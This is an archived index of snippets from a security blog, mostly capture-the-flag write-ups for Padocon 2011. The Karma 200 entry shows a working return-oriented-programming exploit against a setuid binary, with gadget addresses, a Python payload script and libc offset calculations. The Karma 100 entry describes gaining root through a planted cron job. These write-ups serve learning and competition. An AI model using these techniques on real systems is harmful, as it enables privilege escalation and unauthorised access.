archive-fr.com » FR » A » AEROXTEAM.FR

Total: 49

Choose link from "Titles, links and description words view":

Or switch to "Titles and links view".
  • Gu1's Website - Posts taggés « conference »
    Salut J étais au Hackito Ergo Sum 2011 le week end dernier Je n avais pas eu l opportunité d écrire d article sur la précédente édition de cette conférence car mon blog était plus ou moins mort fermé donc je vais me rattraper en vous parlant du contenu de cette année Le niveau des talks était très bon et l ambiance plus cosmopolite que certaines autres confs françaises Le

    Original URL path: http://gu1.aeroxteam.fr/tags/conference/ (2015-12-30)
    Open archived version from archive

  • Gu1's Website - Padocon 2011, Karma 200 using ROP
    has almost no code most of those gadgets are probably from libc functions and what not so you can find them in any program compiled with gcc We need a ROP gadget that reads at an address and adds or subtracts the result to a register and I chose that one 0x804850eL add eax ebx 0xb8a0008 lea esp esp 0x4 pop ebx pop ebp Then we have to put the GOT entry of a libc function say strncpy plus 0xb8a0008 in ebx and the offset between that function and whatever function we choose to execute in the libc in eax We can use this gadget to achieve that 0x8048300L pop eax pop ebx leave We now have our two main gadgets but there still are a number of problems we have to deal with First the second gadget ends with a leave Since the leave instruction basically does mov esp ebp pop ebp we will need to make sure ebp points to the rest of our payload when calling this gadget This is tricky with ASLR so we will need a second retsled Second the address contains a null byte and we can t put a null byte in an env variable or it will end the string Since this is the only gadget containing pop eax found by ropeme let s persist and dissasemble it in objdump to see what instruction comes before the pop eax user1 localhost objdump M intel d attackme grep A3 B1 8048300 80482 fb e8 f0 01 00 00 call 80484 f0 do global ctors aux 8048300 58 pop eax 8048301 5 b pop ebx 8048302 c9 leave 8048303 c3 ret It s a call to do global ctors aux I believe the code is defined here in gcc Because our program has no constructors to call this function does nothing bad and we can include it in our gadget to get rid of that anoying null byte If we want to have a more reliable exploit we need to use retsleds since the stack is affected by ASLR I use two 12k retsleds which makes a total of 96kB since the addresses are 4 bytes usr bin python from struct import pack from sys import stdout address in the first retsled found with aslr disabled for tests ADDR RETSLED1 0xbffec330 SINGLERET pack I 0x08048471 address to a simple ret RETSLED SINGLERET 1024 12 an address somewhere in the second ret sled to use as new ebp for the leave instruction ADDR RETSLED2 ADDR RETSLED1 len RETSLED S S RETSLED ret sled S pack I 0x080484e3 pop ebp S pack I ADDR RETSLED2 new ebp in the second ret sled S pack I 0x080482fb call do ctors pop eax pop ebx leave S pack I 0 x new eax the offset between the func we wanna call and strncpy S pack I 0x138e96e8 new ebx strncpy got plt b8a0008 S pack I 0xbffaaaaa new ebp just junk since never used S RETSLED second ret sled S pack I 0x0804850e add eax ebx 0xb8a0008 lea esp esp 0x4 pop ebx pop ebp stdout write S There still is a problem We need to find an address we want to call in the libc The obvious choice is execve but if we try calculating the offset between strncpy and execve or any exec function gdb p execve strncpy got plt 4 0x26570 gdb p execl strncpy got plt 5 0x26870 gdb p execv strncpy got plt 6 0x266d0 gdb p execvp strncpy got plt 7 0x269d0 That s right a null byte in front of every offset We were stuck at this point for some time I looked for every function before strncpy in the libc because a function located at a lower address means a negative offset that starts with 0xff I couldn t find anything interesting but then an idea came up what if instead of looking for a function located before strncpy we looked for any function before strncpy that calls exec and sure enough there was one user1 localhost objdump M intel t lib libc so 6 egrep sstrncpy 0007 a170 g F text 0000014 e strncpy user1 localhost objdump M intel t lib libc so 6 egrep 000 0 7 A lot lot of mostly uninteresting functions user1 localhost objdump M intel d lib libc so 6 egrep 0 s 3 0 7 0 9a f 4 grep exec 3 b018 e8 c3 56 06 00 call a06e0 execve 3 b92e e8 0 d 26 08 00 call bdf40 regexec GLIBC 2 3 4 3 b97b e8 c0 25 08 00 call bdf40 regexec GLIBC 2 3 4 61 d19 e8 c2 ec 03 00 call a09e0 execl The call at 0x3b018 is inside the do system function we didn t use system directly because it executes bin sh which generally drops the effective uid we got from the suid binary We can calculate the offset between strncpy and this call execve in gdb gdb p do system 0x468 strncpy got plt 1 0xfffc0ea8 If we try the exploit we have so far after disabling ASLR we can see that it already works user1 localhost PLOAD python test exploit py gdb q attackme Reading symbols from home user1 attackme no debugging symbols found done gdb address of main s ret gdb b 0x08048471 Breakpoint 1 at 0x8048471 gdb overwrite sebp with the address in the first retsled ADDR RETSLED1 and seip with a leave ret gdb r python c from struct import pack print AAAA 3 pack I 0xbffec330 pack I 0x08048302 regs EAX 0xBFFE765C EBX 0x002C1FF4 ECX 0x00000008 EDX 0xBFFE787F o d I t S z A P c ESI 0x00000000 EDI 0x00000000 EBP 0xBFFEC330 ESP 0xBFFE766C EIP 0x08048471 CS 0073 DS 007 B ES 007 B FS 0000 GS 0033 SS 007 B code 0x8048471 main 77 ret 0x8048472 nop 0x8048473 nop Breakpoint 1 0x08048471 in main gdb x 3 x esp 0xbffe766c 0x08048302 0x00000002 0xbffe7714 gdb nexti regs

    Original URL path: http://gu1.aeroxteam.fr/2011/01/28/padocon-2011-karma-200-using-rop/ (2015-12-30)
    Open archived version from archive

  • Gu1's Website - Posts taggés « buffer overflow »
    padocon return oriented programming writeup Yet another writeup for the Padocon 2011 This time i m gonna talk about karma200 a level that we did not validate during the CTF but i was curious to see how i could exploit it so i worked on it with Mysterie kutio teach and others these last few days Like for karma100 we had ssh credentials to a linux box and found a

    Original URL path: http://gu1.aeroxteam.fr/tags/buffer%20overflow/ (2015-12-30)
    Open archived version from archive

  • Gu1's Website - Posts taggés « ctf »
    directory Here is the source code Enjoy include stdio h include stdlib h include string h int main int argc char argv char buf 4 if argc 2 2 Commentaires Lire la suite Padocon 2011 writeup Karma 100 Par Gu1 le 21 01 2011 à 03 31 tags ctf english format string padocon writeup Hello This is another writeup for the Padocon 2011 CTF This time i m gonna talk about a wargame style binary exploitation level karma 100 This one was not that difficult to exploit in fact it took us only a couple of hours to obtain reliable code execution but we were unable to find the flag until much later We were given ssh credentials and once logged in we had a binary suid boom100 in our home directory with the source code include unistd h include stdio h hi guys This is just warm up int main int argc char argv 5 Commentaires Lire la suite Padocon 2011 writeup Forensic Quest Par Gu1 le 18 01 2011 à 03 09 tags ctf forensic padocon scapy writeup Salut Le premier gros CTF de l année a eu lieu le week end dernier celui de la Padocon 2011 un CTF Coréen auquel j avais déjà participé l année dernière Le CTF lui même était plutôt bien foutu bonne orga Les épreuves étaient intéressantes pas de guessing trop hardcore J ai participé avec la team w0ea fhpr abhf on a du avoir vers les 1800 points mais le classement complet n a pas encore été publié J ai travaillé sur quelques épreuves certaines étaient sympa comme la Forensic Quest que j ai faite avec teach bik3te et d autres Voici donc un 3 Commentaires Lire la suite smpCTF 2010 challenge 9 writeup Par Gu1 le 22 07 2010 à

    Original URL path: http://gu1.aeroxteam.fr/tags/ctf/ (2015-12-30)
    Open archived version from archive

  • Gu1's Website - Posts taggés « english »
    to a linux box and found a setuid binary called attackme in the home directory Here is the source code Enjoy include stdio h include stdlib h include string h int main int argc char argv char buf 4 if argc 2 2 Commentaires Lire la suite Padocon 2011 writeup Karma 100 Par Gu1 le 21 01 2011 à 03 31 tags ctf english format string padocon writeup Hello This is another writeup for the Padocon 2011 CTF This time i m gonna talk about a wargame style binary exploitation level karma 100 This one was not that difficult to exploit in fact it took us only a couple of hours to obtain reliable code execution but we were unable to find the flag until much later We were given ssh credentials and once logged in we had a binary suid boom100 in our home directory with the source code include unistd h include stdio h hi guys This is just warm up int main int argc char argv 5 Commentaires Lire la suite smpCTF 2010 challenge 9 writeup Par Gu1 le 22 07 2010 à 19 25 tags ctf english heap overflow smpctf writeup Note ce post est disponible

    Original URL path: http://gu1.aeroxteam.fr/tags/english/ (2015-12-30)
    Open archived version from archive

  • Gu1's Website - Posts taggés « padocon »
    to a linux box and found a setuid binary called attackme in the home directory Here is the source code Enjoy include stdio h include stdlib h include string h int main int argc char argv char buf 4 if argc 2 2 Commentaires Lire la suite Padocon 2011 writeup Karma 100 Par Gu1 le 21 01 2011 à 03 31 tags ctf english format string padocon writeup Hello This is another writeup for the Padocon 2011 CTF This time i m gonna talk about a wargame style binary exploitation level karma 100 This one was not that difficult to exploit in fact it took us only a couple of hours to obtain reliable code execution but we were unable to find the flag until much later We were given ssh credentials and once logged in we had a binary suid boom100 in our home directory with the source code include unistd h include stdio h hi guys This is just warm up int main int argc char argv 5 Commentaires Lire la suite Padocon 2011 writeup Forensic Quest Par Gu1 le 18 01 2011 à 03 09 tags ctf forensic padocon scapy writeup Salut Le premier gros CTF de

    Original URL path: http://gu1.aeroxteam.fr/tags/padocon/ (2015-12-30)
    Open archived version from archive

  • Gu1's Website - Posts taggés « return oriented programming »
    padocon return oriented programming writeup Yet another writeup for the Padocon 2011 This time i m gonna talk about karma200 a level that we did not validate during the CTF but i was curious to see how i could exploit it so i worked on it with Mysterie kutio teach and others these last few days Like for karma100 we had ssh credentials to a linux box and found a

    Original URL path: http://gu1.aeroxteam.fr/tags/return%20oriented%20programming/ (2015-12-30)
    Open archived version from archive

  • Gu1's Website - Padocon 2011, writeup Karma 100
    strace d the program to see what filename it tried to execute Unfortunately the first address passed to execve was 0x003994c4 and it pointed to a serie of null bytes so we had to write something at this address too because execve can t execute a an empty string Then we straced the program again with our payload and found out execve was trying to execute xa0 xc6 so we simply created a symlink python c import os from stat import os symlink evilbinary xa0 xc6 And that was pretty much it But then wat do We tried to read boom100 s home directory obviously but no luck it was chmoded 750 and chowned root boom100 We did not have boom100 s gid since the binary was only setuid We searched for a long time tried to find any file owned by boom100 that would allow us to log in or at least to execute a command with sufficient privileges The only file find found was var spool mail boom100 and it was empty We gave up for the night and tried again the second day At this point the file var spool mail boom100 contained data about some cron job that could not be executed As you probably guessed we needed to add a cron job Since the cron daemon is running as root and logs in each account to execute jobs we only needed to create a cron job that would put a copy of the key file somewhere else So we first created a job that listed boom100 s home directory total 40 drwxr x 4 root boom100 4096 Jan 14 02 55 drwx x 12 root root 4096 Jan 13 02 57 rw 1 root boom100 229 Jan 12 22 40 bash history rw r r

    Original URL path: http://gu1.aeroxteam.fr/2011/01/21/padocon-2011-writeup-karma-100/ (2015-12-30)
    Open archived version from archive